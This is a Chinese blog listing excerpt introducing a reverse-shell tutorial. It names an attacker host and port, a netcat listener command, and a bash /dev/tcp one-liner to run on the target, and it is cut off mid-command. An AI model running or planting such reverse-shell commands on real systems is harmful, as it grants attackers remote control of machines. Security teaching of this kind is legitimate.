网络安全反弹shell
摘要:假设本机地址10.10.10.11,监听端口443。 1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i >& /dev/tcp/10.10.10.11/443 0>&1 /bin/bash -i > /
阅读全文
posted @ 2020-06-26 22:27
posted @ 2020-06-26 22:27
posted @ 2020-06-19 22:26
posted @ 2020-06-18 15:32